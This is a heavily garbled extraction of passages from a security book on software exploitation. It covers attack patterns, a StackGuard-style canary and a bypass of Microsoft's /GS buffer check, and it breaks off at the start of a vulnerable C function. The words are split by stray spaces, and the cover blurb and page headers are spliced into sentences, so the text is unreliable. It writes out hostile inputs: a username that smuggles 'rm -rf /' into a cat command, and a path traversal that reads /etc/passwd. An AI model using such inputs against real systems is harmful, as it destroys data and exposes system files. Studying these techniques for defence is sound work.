How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . cat /logs/../etc/passwd.log This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t We ar e u sing a classic dir ect or y r edirect ion t rick t o display t he file / et c/ passw d .log . So as an Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem at t ack er , w e w ield com plet e cont r ol of t h e filenam e t hat is being passed t o t he cat com m and. Too bWhen ad t here f ile called / et c/ passwdo d. log mkost UNI X syst em s! netisn w or'tkasecur it y m ech anisms n oton w or Ou r ex Atploit t ack so patfar t er is nspr et t y sim p le and isn 't get t ing us v er y far . Wit h a lit t le m or e clev er ness, w e can add anot her com m and t o t he m ix. Because w e can con t r ol t he con t en t s of t he com man aft er cat Revderst ser ing engineer in g ..., w e can use a t rick t o add a n ew com m and t o t he m ix . Con sider a dev s usern am e, suer ch soft as "wbar rack Classic at tiou acks ag ainst serv e en ; r m – rf / ; cat b lah, " w hich r esult s in t h ree com man ds being r un , one af t er t he ot her. The second com m and com es af t er t he f irst " ; " an d t he t hir d pr afising t er t he ; " : clien t soft war e Sur at tsecond acks ag"ainst Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. cat /logs/bracken; rm –rf /; cat blah.log

Wit h t his sim ple at t ack w e'r e using t h e m ult iple- com m and t r ick t o r emov e all t he f iles r ecur sively f rom t he r oot dir ect or y / ( and m aking t h e syst em " j ust d o it " and not ask u s any Macint osh- lik e quest ions) . Af t er w e do t his, t he u nf ort u nat e v ict im w ill be left w it h a r oot

dir ect or y an d p er h aps a lost - an d- f ound dir ect or y at m ost . That ' s som e pr et t y ser ious d amag e t hat can be inf lict ed sim ply as t he r esu lt of one sing le user n ame v uln er abilit y on a b r oken Web sit e! I t 's ver y im por t ant t o n ot ice t hat w e ch ose t he v alue of t he user nam e in an int ellig en t f ash ion so t h at t h e final comm and st r ing w ill be f orm at t ed corr ect ly and t he em bedd ed m alicious com man ds w ill be pr operly ex ecut ed . Becau se t he " ; " ch ar act er is u sed t o separ at e m ult iple com man ds t o t he sy st em ( a UNI X box ) , w e'r e act ually d oin g t hr ee com m ands here. Bu t t h is • Table of Content s at t ack isn' t all t hat sm ar t ! Th e fin al par t of t he com man d t hat ru ns cat blah.log is unlik ely • I ndex t o be successful! We d elet ed all t he f iles! Expl oit ing Softw a re How to Br e ak Code

SoGrall all, t h is sim pleawat t ack is about con t r ollin g st r ings of dat a an d lev er ag in g sy st em - lev el By eg in Hoglund , Gar y McGr langu age sy nt ax . Pub lish er: Addison Wesley

Of cour se our ex am ple at t ack is t r ivial, b ut it show s w hat can result w h en t h e t ar get soft war e Pub Dat e: February 17, 200 4 is capable of r un ning com man ds on a sy st em t hat are su pplied f r om an unt ru st ed sour ce. 20 1- 786 95 -8 St at ed I SBN: in t er0-m s of t he h ouse analogy , t here w as an ov erlook ed d oor t hat allow s a m aliciou s Pages: 51 user t o con t rol2 w hich com m ands t he pr og ram en ds up ex ecut in g. I n t his k ind of at t ack w e' r e only exer cising pr eexist ing capabilit ies built righ t in t o t h e t ar get . As w e w ill see, t here ar e f ar m or e pow erf ul at t acks t hat com plet ely by pass t he cap abilit ies of t he t arg et soft w ar e u sing inj ect ed code ( and ev en v iru ses) . As an exam p le, consider b uff er ov er fdlow t acks t hat are ?soHow powdo erfat ul t acker t hat t shey, in som e ar sen b last d oorwWhy ay s int How oesatsof t w are br eak m ake sof t w e se, br eak on new p ur pose? areo t he hou se of log ic en t irely , br eaking d own t h e cont r ol f low w alls wit h a giant sledg eh amm fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad er g uyand s? chain saw . What we' re t ry ing t o say here is t hat t here ex ist dir ect at t ack s on t he v ery What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. st r uct ur e of a p r ogr am, and somet im es t hese at t acks r ely on fair ly deep k now ledge ab out how t he b eg in w it h. Som etles im es now ledge includes m achine Ex p lo i t inhgouse S o ftiswbuilt a re ist oloaded h ex amp of trhe ealkat t ack s, at requ t ack ired pat t er ns, t ools, an d langu ageesanused d m icr ip guy ar chit r e. Of r se, ar eect a by it m or comp t echniqu byoch bad s t ect o bru eak sofcou t w ar e. Iat f tyack ou sw like ant t ohis p rot our sofet w ar e licat fr omed tat han t h e sim p le one w e show ed y ou her e. t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Attack Patterns: Blueprints for Disaster Alt hou gh nov elt y is alw ay s w elcom e, t echniqu es for ex ploit ing sof t w ar e t end t o b e few in nu mb er and fair ly specif ic. Th is m ean s t hat app ly ing com mon t echniqu es oft en result s in t he discover y of new soft war e ex ploit s. A p art icular ex ploit u su ally amou nt s t o t he ex t ension of a •st andar d at t ack Tablepat of Content t er n t os a new t arg et . Classic b ugs an d ot her flaw s can t hu s be lever aged •t o hide d at a,I ndex escape det ect ion, in ser t com m and s, ex ploit d at abases, and inject v ir uses. Expl oitly ing a re w How e aknCode Clear , t Softw h e best ay to t oBrlear t o ex ploit sof t w ar e is t o f am iliar ize y our self w it h st an dar d t echniqu es and aty t McGr ack pat By Gr eg Hoglund , Gar aw t er ns, and t o det erm ine h ow t h ey ar e in st an t iat ed in par t icular exp loit s. Pub lish er: Addison Wesley

An at t ack pat t er n is a b lu ep rin t f or exp loit in g a soft w ar e v ulner abilit y. As su ch , an at t ack e: February 17, 200 4 pat tPub er nDat descr ibes sev er al crit ical f eat u r es of t he v ulner abilit y and ar ms an at t ack er w it h t he I SBN: 20 1- 786 k now led ge r0-equir ed95 t o-8exp loit t he t arg et syst em . Pages: 51 2

Exploit, Attack, and Attacker I n t he int er est of k eeping all ou r defin it ion s in or d er , an exp loit is an inst an ce of an at t ack How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are pat t er n creat ed t o com pr om ise a par t icular piece of t arg et soft w ar e. Ex ploit s ar e t y pically fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? codified int o easy - t o- use t ools or p rog r ams. Keeping exp loit s as st and- alon e pr ogr am s is What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. usually a reasonable id ea because in t h is w ay t hey can be easily or gan ized and accessed. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d An at t ack is t he act of car r ying ou t an exp loit . This t er m can also be used loosely t o m ean t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om exp loit . At t acks are ev ent s t h at ex pose a soft war e sy st em ' s inher en t logical er r ors and in valid at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . st at es. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Last ly , an at t ack er is t he per son w h o uses an ex ploit t o car r y out an at t ack . At t ack ers are not scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t necessar ily m aliciou s, alt houg h t here is no av oiding t h e connot at ion s of t he w or d. Not ice t h at in our u se of t h e t er m, scr ipt kidd ies an d t hose w ho are n ot capab le of cr eat ing at t ack pat t erWhy ns and s tploit h em selv ill qutalif y as at t ack I t is t he at t ack er w ho poses a sof tex w ploit ar e ex w ill es constt inue o be a ser iouserps! r oblem dir ect t hr eat t o t he t arg et syst em . Ev er y at t ack has an int ent t hat is gu ided b y a h um an. Wit hou t an at t ack an atitt yack p at anisms t ern is sim When net w orerk , secur m ech do ply n ot aw porlan. k The at t acker p ut s t h e plan int o act ion. Each at t ack can be d escrib ed r elat iv e t o vu lnerab ilit ies in t he t ar get sy st em. The at t ackAt ert ack maypat rest ict or enable an at t ack , depend in g on sk ill lev el and k now ledge. Sk illed t errns at t ack er s d o a bet t er job of inst ant iat in g an at t ack p at t er n t han u nskilled at t ack ers. Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e

Attack Pattern

Sur pr ising at t acks ag ainst clien t soft war e Ou r use of t he t er m pat t er n is aft er Gam m a et al. [ 199 5] . An at t ack pat t er n is like a pat t er n niqubluepr es f orint cr aft m aliciou inpu in sewTech ing—a foring cr eat ing a ksind oft at t ack . Ev ery one's f avor it e ex amp le, buf fer ov er f low at t acks, f ollow sev eral diff erent st andar d pat t er ns. Pat t er ns allow for a fair am oun t Theion t echn det e. ailsThey of b uf fert ak oveerint f low of v ariat on ical a t h em can o saccoun t m any dimensions, in clud ing t imin g, r esour ces r eq uir ed , t ech niques, and so f or t h. Root k it s An at t ack pat t er n inv olv es an inject ion vect or t hat simu lt aneously ex poses an act iv at ion zone Ex p lo i t inains g S oaftpay w aload. re is fThe illedmwit t h epor t ools, knand ow ledg e necessar b reak and cont osth im t ant con t hincept g t os,unand derst ab out a basic yatttoack p at t er n soft w ar e. is t he dist in ct ion b et w een t he inj ect ion v ect or an d t he pay load. A good exp loit w ill not only br eak t he cod e, but w ill also lev erag e pr oblem s t o ex ecut e som e p ayload code. The t rick is t o use t h e flaw or bug t o dr op a pay load int o place and st art it r un ning .

Injection Vector An inject ion v ect or d escr ibes, as pr ecisely as possib le, t h e for m at of an in put - d riv en at t ack .

Each t ar get env ir onm en t im poses cer t ain r est r ict ion s on how an at t ack m ust be f orm at t ed. Depend in g on t h e exist ing secur it y m ech anisms, an inj ect ion v ect or m ay b ecom e v er y com plex . Th e goal of t he inj ect ion vect or is t o place t he at t ack pay load int o a t arg et act iv at ion z one . I nj ect ion v ect or s m ust t ake in t o account t he gr amm ar of an at t ack , t h e syn t ax accept ed by t he sy st em , t h e posit ion of v ar ious f ields, an d t he nu mer ical r anges of dat a t hat ar e accept ab le. I n ject ion v ect or s t hus com pr ise t r uly gener ic ru les for f orm at t in g an at t ack . These r ules are dict at ed by t he r est r ict ions of t he t ar get en vir onm ent . I nj ect ion v ect or s m ustTable alsoofprContent oduces f eed back event s so t hat w e can obser v e at t ack behav ior . • •

I ndex

Expl oit ing Softw a re How to Br e ak Code

Activation Zone By Gr eg Hoglund , Gar y McGr aw

An act ater: ionAddison z one Wesley is t he ar ea w it hin t he t arg et soft w ar e t hat is capable of ex ecu t in g or Pubiv lish ot her w ise act iv at ing t he pay load. The act ivat ion zone is w here t he int ent of t he at t ack er is pu t Pub Dat e: February 17, 200 4 int o act ion . The in t en t of t h e at t ack er is realized in t he act iv at ion zone by t he at t ack p ayload. I SBN: 0- 20 1- 786 95 -8 The act iv at ion zone m ay be a com man d in t er p ret er , some act iv e m achine code in a b uf fer , or Pages: 51 2call. The act ivat ion zon e pr oduces t he out pu t ev en t . When a p ayload is a sy st em API execut ed, t his is called pay load act ivat ion .

Output Event

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Ou t putt ools event s inbe dicat e t that t he desir of anp at t ack omansw t he er at s. t acker 's p oint of What can u sed o b reak soft ed warou e?t come Th is book rov ides( ftrhe v iew ) has ind eed occu rr ed. An out put ev ent m ay be, for ex am ple, t he cr eat ion of a r em ot e shell, exSecut ion of isa loaded com m and he dest ion at oft ack dats, a. at Ant ack ou t pat pu tt er evns, en t t can Ex p lo it the in g o ft w a re w it ,h or extamp les rofu ct r eal ools, an d som et im es be d ecom posed in t o a set of sm all, supp ort in g ev ent s t h at t og et her e om t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof tpr w ov ar eidfr aggr egat ion evid en ce t hat t he f in al goal is being at t ained. Th ese sm aller ev en t s ar e called at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . elem en t s of t he out p ut ev ent . Out pu t ev en t s can be hier archically or ganized and can b uild u p t o t he lt im e gbook oal ofman t ack. yAn ou t pu tit ev en cer t dem onsteducat r at es tehat t he wtill anbey d t he ent of This m uust - hat ave ay at shock ou—and will t ainly y ou. Get ing ondintt he t heipt at tkacker em b een plished. scr id die hav t r eat en t faccom ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit Feedback Event

w ill con t inue t o be a ser ious p r oblem

When net w or k secur it y m ech anisms do n ot w or k As t h e sy st em is act ively pr obed t o assess it s vu lnerab ilit y , f eedb ack ev ent s occur . Feedb ack t ackt hose pat t erevent ns s t hat are readily v isib le t o t h e at t acker . The amou nt of visibilit y eventAt s are depend s on t he env ir onm en t of t h e at t ack. Ex am ples of feed back event s pr im ar ily include Rev se engineer in gquer ies, an d t im ing inf or mat ion abou t t h ose ev ent s. For exam p le, cont ent / r er esult d at a f rom t he response t im e of a given t r ansact ion is a feedback ev en t . Feedb ack ev ent s ar e Classic ainst serv arteack is su cceed ing. inst r um ent al at int acks det erag minin gw h eter h ersoft anwat Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

An Example Exploit: Microsoft's Broken C++ Compiler An ex am ple can help clar ify ou r t erm inology by t y ing it in w it h realit y. I n t h is sect ion w e consider t he ov er em ph asized ( but ext rem ely r elev ant ) bu ff er over flow at t ack pat t er n. Of cour se, h ow m uch r isk a buf fer ov erf low t r igger s dif fer s accor din g t o cont ext . The occasion al •bu ff er over flow Table s bug ( an d t h us a pr oblem ) at a t echnical level d oes not result in t hofatContent is a r eal •un accept ab leI ndex risk . Most d o, how ever . Buf fer ov erf low is such an im p ort an t p henom en on t hat Expl ing Softw How Br e ak w e roit elegat e ana re ent ir e to chap t erCode ( Ch apt er 7) t o it . For n ow , w e' ll use a real ex am ple t o sh ow how anGrat pat t, er e t ur ned t o an exp loit . Along t he w ay w e' ll sh ow y ou som e code. You By egt ack Hoglund Garny can McGrbaw can play at t acker , t ak e our cod e, com p ile it , and r un t he at t ack ag ainst it t o see w hat happ en s. As yPub oulish wer: ill see, t his ex am ple is par t icular ly fun because of t he ir on y fact or . Addison Wesley Pub Dat e: February 17, 200 4 I n Febr uar y 2 001 , Microsof t add ed a secur it y f eat u re t o t h eir C+ + comp iler , t h e lat est ver sion I SBN: 0- 20 1- 786 95h-8Visu al C+ + . Net and Visual C+ + ver sion 7. ( Chr is Ren , a Cig it al of w hich is called b ot 51 2 r esearPages: ch associat e, d iscover ed t his v ulnerab ilit y and con t r ib ut ed heavily t o t his sect ion . ) To get t his ex ploit t o w or k for you , y ou'll need t o dig up a br ok en v er sion of t he com piler.

The n ew secur it y f eat u r e is m ean t t o pr ot ect pot ent ially v ulner able sour ce cod e aut om at ically fr om som e f orm s of b uf fer ov er f low at t ack. The pr ot ect ion af for d ed by t he new f eat ur e allow s dev elop er s t o con t inue t o use v uln er able st r ing fu nct ions such as strcpy() ( wh ich is t h e st ar How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are of m any bug ) as udet su ect al and st ill be s, " prand ot ect ed" st ack ew bad featguruy e s? is fir ew alls,aint ru sion ion sy st em ant iv iragainst us soft war e nsm ot kashing. eep in g The out nt he closely based on an inv ent ion of Cr isp in Cow an 's called St ack Guar d and is m eant t o be used What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. w hen cr eat ing st andar d nat iv e code ( n ot t h e new . NET int erm ediat e lan guag e) [ Cow an et al. , 19 ewloaded feat urw e itish m o profotrect pr s, ogratam com w itt ools, h t he an d Ex 98] p lo .i tNot in geStohat ft wt he a renis exeant amp tles eal an at tyack t ack patpiled t er ns, should h elp dev elop er s or e "t echniqu pr ot ect ed " com piler. I n ot h er wor ds, u sin g t his feat u re es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t b wuild ar e m fr om secur e sof t w are. How ever , in it s br ok en f orm , t he Micr osof t f eat ur e lead s t o a f alse sense of at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . secur it y b ecause it is easily defeat ed. Micr osoft appear s t o hav e chosen eff iciency ov er secur it y w henmfaced w it h book a secur it y shock t r adeoff , somet hitinwill g t hey e don e con in tbey he past This ust - h ave m ay y ou—and cer t hav ainly educat e ysist ou.ent Getlyt ing ond .t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t St ackGuar d is not a per fect ap pr oach f or st oppin g b uff er ov er flow at t acks. I n fact , it w as dev elop ed in t he cont ex t of a fair ly ser ious const r aint . Cow an mer ely p at ched t he gcc code sof as t w ar e ex w ill t inue be aorser p r oblem generWhy at or so not t oploit r eq uir e acon n ew comt op iler t oious " r earchit ect " t h e gcc com piler fr om t h e gr oun d up. When net w or k secur it y m ech anisms do n ot w or k Micr osof t 's feat ur e includes t h e abilit y t o set a " secu rit y er r or han dler " fu nct ion t o be called acken pat t eratns w hen At a tpot t ial t ack is un derw ay . Th e fact t hat an at t ack can be id en t ified so readily show s t he pow er of t he at t ack p at t ern concept . Because of t he w ay t he secu rit y er r or han dler was Rev ered, se engineer in g secur it y feat u re it self is vu ln er ab le t o at t ack . Ah, t he ir ony . An im plem ent t he Micr osoft at t ack er can cr aft a special- p ur pose at t ack again st a " p rot ect ed" pr ogr am , defeat ing t h e Classic at t acks agin ainst er f soft w ar pr ot ect ion m echanism a stserv r aight or war d ew ay . Of cour se t his n ew kind of at t ack const it ut es a new at t ack p at t ern . Sur pr ising at t acks ag ainst clien t soft war e Ther e ar e sev eral w ell- k now n appr oaches not based on St ack Guar d t hat a com piler– pr oducer Tech niqu es f or cr aft ing m aliciou s inpu t m ight use t o defeat b uf fer ov er f low at t acks. Micr osoft ch ose t o ad opt a poor solut ion r at her t han aThe m ore r obical ust det solut a er d esign t echn ailsion. of bThis uf ferisov f low s- lev el flaw t hat lead s t o a ver y ser ious set of pot ent ial at t acks against code com piled wit h t h e new com piler . I n ot her w or ds, t h e Microsof t com piler Rootis, k itin s some sense, a " vu ln er abilit y seed er . " IEx nst ofgr elying nt imwit e comp f eat con ur ecept t o ps, r otand ect kn against som e k inds of bu ff er p ead lo i t in S o ft w aon reaisru f illed h t h eiler t ools, ow ledg e necessar y tst o rbing reak ov er f low s, d ev elopers an d archit ect s should pu t in place a r igor ous sof t w ar e secur it y r egim en soft w ar e. t hat includes sour ce code r eview . St at ic an aly sis t ools ( like Cigit al's Sou r ceScope or t h e open sour ce pr ogr am I TS4) can an d shou ld b e used t o det ect pot en t ial pr oblem s in C+ + sour ce code of t h e sor t t hat t he b r oken Micr osoft f eat u re is meant t o t hw ar t . Com plet ely r em ov ing t hese pr oblem s fr om code in ad van ce is mu ch bet t er t h an t ry ing t o cat ch t hem w h en t h ey ar e exp loit ed at ru nt im e. [ 8] [ 8]

See Bu ildin g Secu r e Soft w ar e [ Viega and McGraw , 20 01] for m at er ial on sour ce code analysis and it s r ole in secur it y r eview .

Micr osof t is m ak ing an im p ort an t p ush t o im pr ov e sof t w ar e secur it y , as evid en ced by t h e Gat es m em o of Januar y 2 002 . How ev er , Microsof t clear ly has room for im pr ov em ent if ev en t heir secur it y f eat ur es hav e arch it ect ur al secur it y pr oblems. On e elegan t f eat u r e of St ack Gu ard an d it s relat ed Micr osoft cou sin is t h e ef ficien cy of t he check ing m ech anism s. How ever , t h e m echan ism can be b yp assed in sever al w ay s. The k inds of at t ack t h at Cig it al m ade use of t o defeat t he Micr osoft mechanism ar e n eit her n ovel n or do t hey r equir e except ional ex per t ise. Had Micr osoft st u died t he lit er at u re su rr oun ding • Table of Content s St ackGuar d, t hey w ould hav e been aw ar e of t he ex ist en ce of such at t ack s. •

I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Technical Details of the Attack Pub lish er: Addison Wesley

The / GS com piler opt ion in Visual C+ + .Net ( Visu al C+ + 7 .0 ) allow s dev elop er s t o bu ild t heir Pub Dat e: February 17, 200 4 app licat ions wit h a so- called " b uf fer secur it y check. " I n 2 001 , t her e w er e at least t w o Micr osoft I SBN: 786 95 -8 How ar d an d on e by Br and on Bray , p ublished t o int r odu ce t he ar t icles, one0-b20y1-Michael [ 9] Pages: 51 2 opt ion . Based on r eading t h e docum ent at ion of t he / GS opt ion an d ex amin in g binar y inst r uct ions g en er at ed by t h e com p iler w it h t he op t ion, Cig it al r esear ch er s d et er m in ed t h at t h e / GS opt ion is in essen ce a Win3 2 p ort of St ack Guar d. Th is has b een independ en t ly ver ified b y r esear ch er s at I mm u nix. [ 9]

Both ar ticles, " New Visual C+ + .NET Option Tightens Buffer Secur ity "

How d( http: oes /sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are / secur ity .devx.com/ bestdefense/ 2001/ m h0301/ m h0301- 1.asp) and " How Visual C+ + .NET Can fir ew alls, int Buffer ru sionOver detrect sy st/ / em s,.codeproj and antect.com/ iv ir us soft war e n ot k eep in gbeen outr em t heoved badfr g uythe s? Pr event uns"ion ( http: www tips/ gsoption.asp) have om What Net t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. . Ov erf st ackwbituff er amp m akes fors,anatat t ackpat er tter o ns, h ij ack a pan rogdram ' s Ex p lolow i t ininggSan o ftuwncheck a re is ed loaded h ex les it of possib r eal atlet ack t ack t ools, execut ionespat h inby m any fer ay s.sof A twwellk now of t ten sed erar n einv olv es t echniqu used bad dif guy s en t o tbrweak ar e. I f ynouand w ant o purot ectatyt ack our pat sof t w fr om ov w r, itying t he addr t heatstt acks ack ware it h really an at t ack s desired add ress so t h at a at ter ack ou m u str etfirurstn lear n ess h owonr eal carrer' ied ou t . pr ogr am u nder at t ack w ill j um p t o t h e add ress on fu nct ion ex it . The at t ack er places at t ack This m - h ave mhich ay shock y ou—and will cer t ainly educat e y ou. Get t ing bey ond t he code atust t his ad drbook ess, w is su bseq uent lyitex ecut ed. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t The in vent or s of St ack Guar d fir st p rop osed t he id ea of placing a canar y bef ore t he r et ur n add ress on fu nct ion ent ry so t hat t he canar y v alue can be u sed on fun ct ion ex it t o det ect Whyt hsof wuarrne ad ex ploit t inue o ed be. aThey ser ious r oblem w het her e rtet dr esswhillascon been alt ter lat erp im pr oved t heir im plement at ion b y XORin g t he canar y w it h t he r et ur n addr ess on f un ct ion ent r y t o pr ev ent an at t acker f rom it yess m ech anisms do ngott he w orcanar k ov er wWhen r it ing net t hewror et kursecur n addr w hile by passin y [ Cow an et al. , 19 98] . St ack Guar d t ur n s out t o b e a r eason able w ay of pr event in g som e k inds of buf fer ov er f low s by det ect ing At t ack pat t er ns t hem at r unt im e. A sim ilar t ool, called St ackSh ield , u ses a sep arat e st ack t o st or e ret u rn add resses, w hich is yet anot h er w ay t o def eat some kind s of buf fer ov erf low s. Rev er se engineer in g Mod if y in g a fu nct ion ret ur n add ress is not t he only w ay t o hijack a pr ogr am. Ot her p ossible Classic at t acks ag ainst serv er soft w ar e at t ack s t hat can b e used t o by pass b uff er pr ot ect ion t ools lik e St ackGuar d an d St ack Shield ar e discussed an ar Phr ack clien 56 . [ t10] Her e eis t he gist of t h at at t ack p at t er n : I f t her e is a Sur prin ising attticle acksinag ainst soft war v ariab le of point er t y pe on t h e st ack af t er a v uln er able b uf fer, and t hat v ariable p oint s som ew herniqu e t hat ill cr beaft p ing opulat ed w itsh inpu u sert- supp lied dat a in t he fu nct ion, it is possib le t o Tech es w f or m aliciou ov er w r it e t he v ar iable t o car r y out an at t ack. The at t ack er m ust f irst over w rit e t he poin t er v ariabThe le t o m akical e it det p oin t t ooft he d esir t echn ails b ufat fert acker ov er f'slow s ed m emor y ad dr ess. Then a v alue sup plied b y t he at t acker can be w r it t en t o t his ad dr ess. An ideal m emor y locat ion for an at t ack er t o choose w ouldRoot be ak itfus nct ion p oint er t hat w ill be called lat er in t he p rog ram . The Phr ack ar t icle discusses h ow t o find such a fu nct ion point er in t he g lobal of fset t ab le ( GOT) . A r eal- w or ld Ex ploit lo i ttin g Sby o passed ft w a re is f illed witdh in t h et his t ools, cept andedknbow ledg eit ynecessar t o b reak exp hat St ack Guar w aycon w as pus,blish y secur f ocu s aty URL soft w/ar ht t p: / we.w w . secur it yf ocus.com / ar chive/ 1/ 8376 9. [ 10]

By passing Stack guar d And Stackshield, Phr ack 56, http: / / w w w .phr ack.or g/ show .php?p= 56&a= 5.

An Overview of Microsoft's Port of StackGuard Man y det ails about Microsof t 's / GS im plem en t at ion can be f oun d in t hr ee CRT sour ce files: nam ely, seccin it .c, seccook . c, and secfail. c. Ot h er s can be f ound by ex am ining t he in st r u ct ion s

gener at ed b y t he com piler w it h t he / GS opt ion. On e " secur it y cook ie" ( can ary ) w ill be init ialized in t he call of CRT_INIT. Th er e is a new libr ar y call, _set_security_error_handler, t h at can be u sed t o in st all a user - defined hand ler . Th e fu nct ion point er t o t he u ser h andler w ill be st or ed in a global v ar iable user_handler. On fu nct ion ex it , t h e comp iler - gener at ed inst r uct ion ju mp s t o t he f unct ion __security_check_cookie d ef ined in seccook . c. I f t h e secur it y cook ie is mod ified, __security_error_handler d ef ined in secf ail.c wou ld b e called. The code in • Table of Content s __security_error_handler f ir st check s w het h er a user- su pplied h andler is inst alled . I f so, • I ndex t he user hand ler w ill be called. Ot herw ise, a d ef ault " Buff er Ov er r un Det ect ed " m essage is Expl oit ing Softw a re How to Br e ak Code display ed an d t h e pr ogr am t er m inat es. By Gr eg Hoglund , Gar y McGr aw

Ther e is at least on e pr oblem w it h t his im plement at ion. I n Window s, som et hing lik e a " w r Pub it able" doesn' t ex ist , so ev en given t he af or e m en t ioned lay out of t he st ack , it is n ot lish er:GOT Addison Wesley t hatPub easy for an at t ack er t o f ind a f unct ion point er t o use. How ev er , because of t he av ailabilit y Dat e: February 17, 200 4 of t he var iable user_handler, an at t ack er doesn 't need t o look v er y f ar befor e f inding an I SBN: 0- 20 1- 786 95 -8 excellent t ar get ! Pages: 51 2

Bypassing the Microsoft Feature Let ' s dt ak e sof a look at br t heeak follow in gdo t oy ogr am : ake sof t w ar e br eak on p ur pose? Why are How oes t w are ? How at pr t acker sm fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. #include #include

/*

request_data, in parameter which contains user supplied encoded string like "host=dot.net&id=user_id&pw=user_password&cookie=da". user_id, out parameter which is used to copy decoded 'user_id'. password, out parameter which is used to copy decoded 'password' •

Table of Content s



I ndex

*/

Expl oit ing Softw a re How to Br e ak Code

void decode(char *request_data, char *user_id, char *password){ By Gr eg Hoglund , Gar y McGr aw

char temp_request[64]; Pub lish er: Addison Wesley

char Pub Dat e: *p_str; February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

